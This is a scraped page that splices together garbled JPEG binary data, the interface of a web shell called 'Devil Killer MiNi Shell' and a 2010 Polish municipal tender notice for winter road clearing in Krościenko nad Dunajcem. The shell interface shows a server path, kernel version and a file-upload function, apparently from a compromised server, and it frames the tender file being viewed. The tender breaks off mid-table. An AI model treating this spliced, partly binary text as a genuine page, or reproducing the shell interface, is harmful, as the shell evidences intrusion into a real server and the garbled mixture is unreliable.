JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100928/309894-N-2010.html

<p class="kh_header"><b>Krościenko nad Dunajcem: Zimowe utrzymanie dróg gminnych, placów i chodników na terenie gminy Krościenko nad Dunajcem w sezonie zimowym 2010/2011 - odśnieżanie i posypywanie dróg.</b><br>
<b>Numer ogłoszenia: 309894 - 2010; data zamieszczenia: 28.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd  Gminy , ul. Rynek 35, 34-450 Krościenko nad Dunajcem, woj. małopolskie, tel. 0182623077 wew. 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kroscienko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych, placów i chodników na terenie gminy Krościenko nad Dunajcem w sezonie zimowym 2010/2011 - odśnieżanie i posypywanie dróg..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie usługi : zimowe utrzymanie dróg gminnych na terenie Gminy Krościenko n.D na następujących trasach (poszczególne części zamówienia)::
TRASA Nr I - sołectwo Biały Potok - Tylka, sołectwo Kąty-Niwki, sołectwo Dziadowe Kąty-
     długość  trasy 14,7 km
TRASA Nr II - sołectwo Hałuszowa, sołectwo Krośnica  - długość trasy 9,2 km
TRASA Nr III - sołectwo  Grywałd   - długość trasy 16,5 km
TRASA Nr IV -sołectwo Krościenko Zawodzie - długość  trasy  10,5 km

CZĘŚĆ I
Trasa I                                               Biały Potok, Tylka, Kąty-Niwki, Dziadowe Kąty                          Wymagany sprzęt do odśnieżania: samochód z pługiem, ciagnik zpługiem,  	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
Biały Potok-Tylka                razem	2,6	---------	6,6
Biały Potok -Tylka Górzany	---------	4,0	4,0
Pustki do Gabrysia	0,2	---------	0,2
od Gabrysia  do szkoły	0,7	---------	0,7
od Dydy Cz. do os. Rokitek-Surowiak	0,2	---------	0,2
osiedle Pod Tylką do Błażusiaka B.	0,9	---------	0,9
od gł.drogi do Adamczyków	0,1	---------	0,1
od drogi gł. do Malików	0,2	 	0,2
od gł. drogi w osiedlu Dydowie do p.Ptak	0,1	---------	0,1
pętla przy gimnazjum, dojazd do parkingu przy gimnazjum	0,2	---------	0,2
 	 	 	 
Kąty-Niwki                           razem 	1,9	2	3,9
Węgliska od Dutki-Potaśniki-gł.droga	1,1	---------	1,1
od Piekiełka do Waksmundzkiego	---------	1,3	1,3
Dziurne-Knapczyki-Tkaczyki	0,2	---------	0,2
Dutki do Mroza Wł.	---------	0,7	0,7
od Mroza do Koterby J.	0,2	---------	0,2
od Mroza do Chrobaka	0,1	---------	0,1
od Koterby Krystny-Niwki 14	0,3	---------	0,3
 	 	 	 
Dziadowe Kąty                   razem	0,9	3,3	4,2
ul.Jana Pawła II cała	---------	2,0	2,0
ul.Zamkowa-do Śpiewaka, Otockiego	---------	0,9	0,9
ul.Palenicka	0,3	---------	0,3
ul.Przylasek (od Gabrysiów-Nowaczyki-Kołki do Janczego)	0,6	---------	0,6
ul.Pod Tylką(Tokarczyki-do Janczego)	---------	0,4	0,4
Trasa I                                razem	5,4	9,3	14,7

CZĘŚĆ II
Trasa II                                       Krośnica, Hałuszowa                             Wymagany sprzęt do odśnieżania: samochód z pługiem, ciągnik z pługiem,  	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
Krośnica                                   razem	---------	4,7	4,7
ul.Trakt Królewski	---------	0,4	0,4
ul.Ojca Leona	---------	1,9	1,9
ul.Dziołki	---------	0,3	0,3
ul.Polna	---------	0,7	0,7
ul.Józefa Robotnika (za kościół)	---------	0,6	0,6
ul.Parkowa	---------	0,4	0,4
plac przed remizą OSP - ok.100m2	---------	0,1	0,1
dojazd do 4-ech posesji od ul.Nowotarkiej	---------	0,3	0,3
 	 	 	 
Hałuszowa                               razem	1,5	3,0	4,5
od Majerza do drogi gł. pod Hałuszową	---------	2,1	2,1
Łącznik	---------	0,2	0,2
We wsi (do P.Kołodzieja)	---------	0,7	0,7
oś.Kurzejówka całość od Majerza pod Hałuszową	1,5	---------	1,5
Trasa II                                   razem	1,5	7,7	9,2

CZĘŚĆ III
Trasa III                                                   Grywałd                                             Wymagany sprzęt do odśnieżania samochód z pługiem, ciagnik z pługiem, 	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
ul.Dworska	---------	0,6	0,6
ul.Gielniarz	---------	0,8	0,8
ul.Graniczna (do Sajdaka)	0,6	---------	0,6
ul.Kościelna	---------	0,6	0,6
ul.Krośnicka	---------	0,6	0,6
ul.Krótka 	---------	0,1	0,1
ul.Kwiatowa	---------	0,4	0,4
ul.Lipowa 	---------	0,9	0,9
ul.Lubań	---------	1,8	1,8
ul.Łąkowa	---------	0,5	0,5
ul.Ogrodowa	---------	0,2	0,2
ul.Pienińska	---------	1,4	1,4
ul.Podłazie	0,5	---------	0,5
ul.Podzagonie	---------	1	1,0
ul.Polna (z boczną ul. do Psiarki)	0,4	---------	0,4
ul.Rzeczna	---------	0,2	0,2
ul.Słoneczna 	0,9	---------	0,9
ul.Szkolna	---------	0,7	0,7
ul.Wybraństwo (do Błażusiak)	---------	0,4	0,4
ul.Wymyśle (do Wójcika)	---------	1,3	1,3
ul.Zakopie (do Malika)	---------	0,6	0,6
ul.Żarnowiecka	---------	0,2	0,2
dojazd do cmentarza	---------	0,2	0,2
parking przy kościele  - 700m2	0,7	 	0,7
parking przy szkole    - 300m2	0,3	 	0,3
parking w centrum      - 600m2	0,6	 	0,6
Trasa III                             razem	4,0	12,5	16,5

CZĘŚĆ IV
Trasa IV                                       Krościenko Zawodzie                             Wymagany sprzęt do odśnieżania samochód z pługiem, ciągnik z pługiem,	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
Chodnik Przyjaźni	1,6	0,1	1,7
ul.Franciszka Koterby-kuriera AK	 	0,4	0,4
ul.Jarek	0,9	 	0,9
ul.Juraszowa	 	1,5	1,5
ul.Karola Wojtyły-papieża	 	0,6	0,6
ul.Leśna	1,1	 	1,1
ul.Polna (do Kaczorowskiego)	 	0,6	0,6
ul.Stanisławy Pawłowskiej	 	0,1	0,1
ul.Stodółki	0,1	 	0,1
ul.Zdrojowa	1,8	 	1,8
ul.Źródlana	 	1,1	1,1
Parking przy ul.Źródlanej	0,6		0,6
Trasa IV                          razem	6,1	4,4	10,5
2.Informacje dodatkowe dotyczące przedmiotu zamówienia : 
1/Każdy z oferentów winien zapoznać się i sprawdzić  poszczególne TRASY ,w których wyszczególnione są drogi - ulice do zimowego utrzymania celem zapoznania się z warunkami związanymi z wykonaniem usługi będącej przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i  przydatnych do oceny prac-usług, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. 
2/Koszty wizji dróg-ulic będących przedmiotem zamówienia poniesie oferent.
3/Zakres prac - usług , obowiązków oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje :
a)Zakup materiału na posypywanie dróg ( piasek, grys, sól)  zabezpieczyć we własnym zakresie i na własny koszt. , 
b)Ograniczenie nawiewania śniegu na korpus drogowy poprzez zamontowanie zasłon śnieżnych w miejscach o największej uciążliwości utrzymania dróg : Grywałd  ul. Wymyśle koło osiedla Kołków ok. 20 mb, ul.Podzagonie  tj,pomiędzy skrzyżowaniem dróg  na Podzagoniu  ok.30 mb
Krościenko ul.Polna od strony północnej tj.z lewej strony od ul. Jarek ok.200 mb
W/w prace należy wykonać we własnym zakresie i na własny koszt.
4/Drogi muszą być odśnieżane we wczesnych godzinach rannych do godz 700 oraz w ciągu dnia czyli  na bieżąco aby gromadzący się na jezdni śnieg,  błoto pośniegowe nie powodowały utrudnień w poruszaniu się na drogach .
5/Drogi mają być na bieżąco posypywane w celu likwidowania śliskości, gołoledzi.
6/Wykonywanie czynności ma być rzetelne i w miarę potrzeb, w zależności od warunków atmosferycznych.
7/Uwzględnianie uwag i wniosków Zamawiającego w okresie wykonywania obowiązków umowy.
8/W przypadku braku występowania opadów atmosferycznych powodujących konieczność odśnieżania lub usuwania gołoledzi w danym miesiącu kalendarzowym objętym umową - wykonawcy usługi będzie przysługiwało wynagrodzenie w wysokości 40 % podanej w ofercie stawki za zimowe utrzymanie dróg na poszczególnych trasach za gotowość do prowadzenia akcji zimowej.
9/Do obowiązków Wykonawcy w ramach złożonej oferty należeć będzie po okresie zimowym tj. po dniu 31-03-2011 wykonanie prace porządkowe polegające na zamiataniu i zebraniu materiału używanego do posypywania jezdni na odśnieżanych trasach
W/w prace wykonawca jest zobowiązany wykonać w terminie 14 dni od telefonicznego lub pisemnego wezwania przez Zamawiającego. 
10/Wykonawca na swój koszt dokona naprawy wszelkich zniszczeń powstałych w mieniu gminnym lub osób prawnych lub fizycznych niezwłocznie po zakończeniu akcji zimowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 50 % wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca załączy do druku ofert stosowne oświadczenie. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca załączy do druku ofert stosowne oświadczenie. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca załączy do druku ofert stosowne oświadczenie. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca załączy do druku ofert stosowne oświadczenie. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty
(Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączącego go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu zamówienia. )
Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca załączy do druku ofert stosowne oświadczenie. Ocena spełnienia powyższego warunku będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Odpis z właściwego rejestru jeżeli odrębne przepisy wymagają wpisu do rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt.2 ustawy w.g Załącznika Nr 3 do niniejszej SIWZ. 2)Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika Nr 1 do SIWZ 3)Wypełniony formularz cenowy z wykorzystaniem wzoru wg Załącznika Nr 2 do SIWZ; 4)Podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Załącznik nr 3 do SIWZ; 5)Podpisane oświadczenie o ustanowieniu pełnomocnika (jeżeli występuje) w.g Załącznika Nr 3a do SIWZ 6)Wykaz sprzętu przeznaczonego do realizacji zamówienia wg Załącznika Nr 4; 7) Informacja o podwykonawcach wg. Załącznika Nr 5; 8) Inne dokumenty i oświadczenia wynikające z zapisów SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>I.W oparciu o art.144 ust.1 ustawy zamawiający informuje, że w przypadku występowania niekorzystnych warunków atmosferycznych po okresie obowiązywania umowy, dopuszcza się przedłużenie terminu wykonania umowy w formie pisemnego aneksu.
II.Cena brutto przedmiotu umowy może zmienić się tylko w przypadku urzędowej zmiany stawki podatku VAT.
Stawka podatku VAT określona jest zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz.U. z 2004 r. Nr 54, poz. 535 ze zm.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/gminy/root_Kroscienko+n_Dunajcem<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego:- Urząd Gminy Krościenko n.Dunajcem, Rynek 35, 34-450 Krościenko n.D, pok. nr 4 w godzinach urzędowania..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2010 godzina 09:00, miejsce: miejsce: siedziba zamawiającego - Urząd Gminy Krościenko n.Dunajcem, Rynek 35, 34-450 Krościenko n.D, SEKRETARIAT...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trasa Nr I- Biały Potok, Tylka, Kąty-Niwki, Dziadowe Kąty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa I                                               Biały Potok, Tylka, Kąty-Niwki, Dziadowe Kąty                          Wymagany sprzęt do odśnieżania: samochód z pługiem, ciagnik zpługiem,  	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
Biały Potok-Tylka                razem	2,6	---------	6,6
Biały Potok -Tylka Górzany	---------	4,0	4,0
Pustki do Gabrysia	0,2	---------	0,2
od Gabrysia  do szkoły	0,7	---------	0,7
od Dydy Cz. do os. Rokitek-Surowiak	0,2	---------	0,2
osiedle Pod Tylką do Błażusiaka B.	0,9	---------	0,9
od gł.drogi do Adamczyków	0,1	---------	0,1
od drogi gł. do Malików	0,2	 	0,2
od gł. drogi w osiedlu Dydowie do p.Ptak	0,1	---------	0,1
pętla przy gimnazjum, dojazd do parkingu przy gimnazjum	0,2	---------	0,2
 	 	 	 
Kąty-Niwki                           razem 	1,9	2	3,9
Węgliska od Dutki-Potaśniki-gł.droga	1,1	---------	1,1
od Piekiełka do Waksmundzkiego	---------	1,3	1,3
Dziurne-Knapczyki-Tkaczyki	0,2	---------	0,2
Dutki do Mroza Wł.	---------	0,7	0,7
od Mroza do Koterby J.	0,2	---------	0,2
od Mroza do Chrobaka	0,1	---------	0,1
od Koterby Krystny-Niwki 14	0,3	---------	0,3
 	 	 	 
Dziadowe Kąty                   razem	0,9	3,3	4,2
ul.Jana Pawła II cała	---------	2,0	2,0
ul.Zamkowa-do Śpiewaka, Otockiego	---------	0,9	0,9
ul.Palenicka	0,3	---------	0,3
ul.Przylasek (od Gabrysiów-Nowaczyki-Kołki do Janczego)	0,6	---------	0,6
ul.Pod Tylką(Tokarczyki-do Janczego)	---------	0,4	0,4
Trasa I                                razem	5,4	9,3	14,7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.21.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Trasa Nr II- Krośnica, Hałuszowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasa II                                       Krośnica, Hałuszowa                             Wymagany sprzęt do odśnieżania: samochód z pługiem, ciągnik z pługiem,  	2010-2011
	ilość               km              bez posypywania	ilość               km                       z posypywaniem	razem
